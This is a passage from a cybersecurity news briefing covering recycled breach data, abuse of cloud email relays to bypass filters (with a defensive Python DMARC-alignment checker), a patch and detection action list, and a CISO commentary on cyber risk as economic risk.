Threat actors are repackaging old data and reselling it as fresh leaks—a tactic we’ve seen repeatedly this month.
James noted: “Threat actors dabble in crime, not truth. Every time they rehash old data, it’s not a hack — it’s a hustle.”
The repackaged dump could still harm customers through loyalty fraud and refund scams, so Iberia customers should:
Reset passwords and enable MFA
Monitor loyalty point balances for unusual activity
Step up risky login monitoring and credential stuffing defense
🌐 CLOUD & EMAIL INFRASTRUCTURE ABUSE
Attackers Abuse Google Cloud Email to Evade Filters
Check Point researchers discovered cybercriminals abusing Google Cloud’s trusted email infrastructure to boost spam delivery rates and bypass corporate filters. By sending through legitimate Gmail API chains, attackers inherit Google’s sender reputation: the mail passes SPF and DKIM for the relay’s own domains, and filters that stop at those results instead of checking DMARC alignment against the visible From address let it through.
To Counter This:
Enforce strict DKIM and SPF alignment
Reduce implicit trust in cloud-originating mail
Monitor API service account activity
This is another example of attackers weaponizing trusted cloud infrastructure to exploit enterprise trust models.
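“Strict DKIM and SPF alignment” is the DMARC record’s `adkim=s; aspf=s` pair, and the test a gateway has to run is whether the domains that actually passed SPF and DKIM match the RFC5322.From domain. The added example below (not Check Point’s research code) parses the receiving gateway’s Authentication-Results header and evaluates alignment in strict or relaxed mode for two constructed messages: one relayed through a third-party cloud mail API that passes SPF and DKIM only for the relay’s own domains while the From names the company, and one sent from the company’s own infrastructure. The `org_domain()` helper is a two-label shortcut, not a Public Suffix List lookup, and the domains are reserved placeholders.

```python
"""Check DMARC identifier alignment for a received message.

Added example.  Parses the gateway's Authentication-Results header and compares
the SPF (smtp.mailfrom) and DKIM (header.d) domains with the From domain.
Both messages are constructed; org_domain() is a simplification."""
import re
from email import message_from_string
from email.utils import parseaddr

# Gateway-authenticated mail whose From claims the company, but SPF and DKIM
# pass only for the relay provider's domains (constructed sample).
RELAYED_SPOOF = """\
Authentication-Results: mx.example.net;
 spf=pass smtp.mailfrom=bounce.relay-provider.example;
 dkim=pass header.d=relay-provider.example header.s=sel1;
 dmarc=none
From: "Accounts Payable" <ap@example.com>
To: cfo@example.net
Subject: Updated banking details

Please update our remittance account before Friday.
"""

# Same shape, sent from the company's own mail infrastructure (constructed).
ALIGNED_MAIL = """\
Authentication-Results: mx.example.net;
 spf=pass smtp.mailfrom=bounce.example.com;
 dkim=pass header.d=example.com header.s=corp2026
From: "Accounts Payable" <ap@example.com>
To: cfo@example.net
Subject: Q1 invoice

Attached as discussed.
"""

METHOD_RE = re.compile(r"^\s*(spf|dkim)=(\w+)", re.I)
PROP_RE = re.compile(r"(smtp\.mailfrom|header\.d)=([^\s;]+)", re.I)


def parse_auth_results(value):
    """Return {"spf": [(result, domain)], "dkim": [(result, domain)]} from one header."""
    out = {"spf": [], "dkim": []}
    for clause in value.split(";")[1:]:          # clause 0 is the authserv-id
        match = METHOD_RE.match(clause)
        if not match:
            continue
        method, result = match.group(1).lower(), match.group(2).lower()
        props = {k.lower(): v.lower() for k, v in PROP_RE.findall(clause)}
        domain = props.get("smtp.mailfrom" if method == "spf" else "header.d", "")
        if "@" in domain:                        # mailfrom may be a full address
            domain = domain.rsplit("@", 1)[1]
        out[method].append((result, domain.rstrip(".")))
    return out


def org_domain(domain):
    """Simplified organizational domain: last two labels (assumption, no PSL)."""
    return ".".join(domain.lower().split(".")[-2:])


def aligned(domain, from_domain, mode):
    """DMARC alignment: strict ('s') needs an exact match, relaxed ('r') an org match."""
    if not domain:
        return False
    if mode == "s":
        return domain == from_domain
    return org_domain(domain) == org_domain(from_domain)


def dmarc_alignment(raw_message, adkim="s", aspf="s"):
    """Evaluate alignment as a DMARC policy with the given adkim/aspf tags would.
    DMARC passes if either authenticated identifier aligns with From."""
    msg = message_from_string(raw_message)
    from_domain = parseaddr(msg.get("From", ""))[1].rsplit("@", 1)[-1].lower()
    auth = parse_auth_results(msg.get("Authentication-Results", ""))
    spf_ok = any(res == "pass" and aligned(dom, from_domain, aspf) for res, dom in auth["spf"])
    dkim_ok = any(res == "pass" and aligned(dom, from_domain, adkim) for res, dom in auth["dkim"])
    return {"from_domain": from_domain, "spf_aligned": spf_ok,
            "dkim_aligned": dkim_ok, "dmarc_pass": spf_ok or dkim_ok}


if __name__ == "__main__":
    for label, raw in (("relayed spoof", RELAYED_SPOOF), ("aligned mail", ALIGNED_MAIL)):
        print(label, dmarc_alignment(raw))
```

Both messages carry `spf=pass` and `dkim=pass`, which is all a reputation-driven filter sees; only the alignment step separates the relayed impostor (neither identifier matches example.com) from the genuine one. Publishing `p=reject` with strict tags, and making your gateway honor it rather than trusting cloud-originating mail by default, is the “reduce implicit trust” item above in concrete terms.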
OwnCloud Urges MFA After Credential Thefts
After multiple credential theft incidents, OwnCloud is now urging users to enable phishing-resistant MFA, rotate admin keys, and restrict admin panels behind VPN or IP allowlists.
🎭 DECEPTION OPERATIONS & UNUSUAL INCIDENTS
White Supremacist Dating Site Hacked - “okstupid.lol“
To close the show, a German hacker known as Martha Root—dressed as a pink Power Ranger—breached a white supremacist dating site and dumped the data online under okstupid.lol.
It’s both absurd and oddly poetic: a Power Ranger exposing hate groups looking for love. Root’s hack revealed thousands of extremist profiles across Europe and the U.S.
✅ YOUR COMPREHENSIVE ACTION LIST
IMMEDIATE CRITICAL PATCHING:
🧱 Fortinet Firewalls - 10,000+ still vulnerable to 2020 MFA bypass (5 YEARS unpatched!) - update to 6.4.1+, 6.2.4+, or 6.0.10+
🔐 n8n Automation Platform - CVSS 10.0 RCE (CVE-2026-21877) - upgrade to 1.121.3+
💾 Veeam Backup - Critical RCE (CVE-2025-5470) threatens ransomware recovery - patch immediately
📱 Android Dolby - CVE-2025-5549 RCE via crafted media - deploy January patch via MDM
🧱 Adobe ColdFusion - Under coordinated attack - patch, disable admin interfaces, sweep for web shells
💻 VMware ESXi - Turnkey exploit kit circulating - patch to supported builds; hide vCenter behind VPN
📄 JS PDF - Critical flaw enables secret theft - upgrade library; add CSP headers
🔥 FortiWeb - Sliver C2 deployment via outdated firmware - patch to 6.1.62+
📡 D-Link DSL Routers - RCE being actively exploited - replace or isolate immediately
📧 Microsoft Exchange - Doticat malware targeting IIS modules - upgrade to supported builds
ECONOMIC & BUSINESS IMPACT:
🚗 Use JLR as case study - Quantify cyber risk in revenue/GDP terms for board presentations
💼 Credibility assessment - If you manage risk and get breached, response defines whether clients stay
📊 Track economic impact metrics - Sales drops, bailout requirements, GDP citations
RANSOMWARE & MALWARE DEFENSE:
💣 Harden VPNs with MFA - Hunt for PowerShell execution chains (LockBit 5.0)
🚫 Block SEO-malware ads - Train users to verify installers (BlackCat Google Ads)
⚙️ Apply WAF and EDR rules - For React2Shell/Node.js apps (RondoDox botnet)
🔍 Hunt for Sliver C2 artifacts - And FRP binaries in FortiWeb environments
📊 Monitor backup operations - For anomalies; alert on unexpected restores
AI SECURITY:
🤖 Treat model inputs as untrusted - Implement context firewalls (OpenAI prompt injection)
🧩 Whitelist Chrome extensions - Disable unsanctioned AI plugins (900K installs stealing chats)
📊 Adopt enterprise AI tenants - With DLP and retention policies
🔐 Deploy AI context isolation - User intent validation for sensitive actions
EMAIL & CLOUD INFRASTRUCTURE:
📧 Tighten Google Cloud API policies - Enforce email alignment standards (Check Point research)
🔐 Enforce strict DKIM/SPF alignment - Reduce implicit trust in cloud-originating mail
📊 Monitor API service account activity - For abuse of trusted infrastructure
DATA BREACH RESPONSE:
✈️ Audit loyalty systems - For fraudulent redemptions; enable MFA (Iberia recycled breach)
🏢 Illinois lesson - Conduct asset inventories, access reviews, key rotations
🔑 Cross-reference breach data - With internal user bases; force resets where overlap exists
INFRASTRUCTURE & EDGE SECURITY:
🧱 Segment IT/OT networks - Gate vendor access behind VPNs, MFA, IP allowlists
🔐 Remove public admin interfaces - For all edge devices and management planes
📊 Rotate device tokens - And admin credentials post-incident
💾 Hide vSphere/vCenter - Behind VPNs; rotate datastore credentials
DETECTION & THREAT HUNTING:
🔍 Monitor for DNS tampering - Or rogue egress traffic (D-Link DSL routers)
🎯 Watch for odd mailbox export spikes - Child processes linked to Exchange (Doticat)
🚨 Hunt for unusual tunneling behavior - Admin route abuse (React2Shell/RondoDox)
📊 Alert on sudden snapshot bursts - Or encryption activity (VMware ESXi)
🧠 JAMES AZAR’S CISO TAKE
This week delivered the wake-up call that CISOs have been warning boards about for years: cybersecurity failures don’t just cost money in incident response fees or ransom payments—they collapse revenues, crash GDP, and force government bailouts. Jaguar Land Rover’s 43% global sales drop costing $220 million in a single quarter while requiring a £1.5 billion government bailout and getting cited by the Bank of England as a drag on national GDP proves beyond any doubt that cyber risk is economic risk, and when our defenses fail, the entire business ecosystem pays the price.
Meanwhile, the UK government’s unprecedented admission that its cyber strategies failed and that government risk is “critically high” represents a watershed moment in how nations approach cybersecurity, finally acknowledging that fragmentation, not the sophistication of attackers, is the biggest threat to government cybersecurity. When you combine this with China launching 2.63 million daily attacks on Taiwan with energy sector attacks surging tenfold, Russian ships physically cutting undersea cables in the Baltic Sea, Trump blocking Chinese semiconductor deals citing national security, and the realization that 10,000+ Fortinet firewalls remain vulnerable to a 2020 MFA bypass that’s been patchable for five years, the message is unmistakable:
2026 is the year when cyber resilience stops being theoretical and becomes operational, when patch management stops being a compliance checkbox and becomes an economic imperative, and when the kinetic-cyber line disappears entirely as submarines cut cables and ransomware collapses manufacturing operations simultaneously.
The second defining message from this week is that our job as security practitioners isn’t perfection—it’s finding risk, explaining risk, and accepting whatever risk tolerance the business chooses, because the shortest path to revenue will always trump the ideal path, and the ideal path rarely exists. From the n8n CVSS 10.0 vulnerability proving that shadow IT workflow tools are the new attack surface, to Chrome extensions with 900,000 installs stealing AI chat logs and intellectual property in real time, to OpenAI confirming that prompt injection remains an unsolved long-term problem, to LockBit 5.0 emerging leaner and faster while BlackCat literally buys Google Ads for SEO poisoning campaigns, the threat landscape has industrialized faster than our defenses have matured.
And when CISA’s KEV Catalog grows by 20% to 1,480 actively exploited CVEs while CISOs are still patching by CVSS scores instead of active exploitation, when Sedgwick gets ransomwared while managing risk for DHS and CISA, when Illinois exposes 700,000 Medicaid recipients through a misconfiguration, and when threat actors are literally repackaging old breach data and selling it as new leaks because the reputational damage never expires—we’re not dealing with a technical problem, we’re dealing with a maturity and discipline gap. The UK’s bold centralization experiment may succeed or create bureaucratic paralysis, Australia’s anti-scam framework may be decoration rather than regulation, and China may be cleaning house publicly while covering up official complicity but the universal truth across all these stories is that cyber resilience in 2026 will be defined by operational maturity, patch velocity, vendor validation, and the willingness to quantify cyber risk in revenue and GDP terms rather than compliance frameworks.
Because when the kinetic side of cyber cuts undersea cables while ransomware collapses automotive sales by 43%, we’re not defending networks anymore—we’re defending economic stability and national security simultaneously.
The age of theoretical cyber risk is over. JLR proved breaches collapse revenues and GDP. The UK admitted fragmentation failed. The kinetic-cyber line disappeared in the Baltic Sea. 2026 is when operational maturity becomes survival-critical.
Stay sharp, stay operational, patch what’s exploited not what’s scored, and as always—stay cyber safe, Security Gang!
Thanks for tuning in. We’ll be back Monday at 9 AM Eastern Live with all the latest!
Absolutely brilliant analysis on the JLR case turning cyber risk into measurable GDP impact. The shift from thinking about this stuff as "IT problems" to actual economic warfare is overdue imo. I remember back in my consulting days, we'd struggle to get board attention until something actually broke. This piece really nails how that kinetic-cyber boundary is dissolving in real time.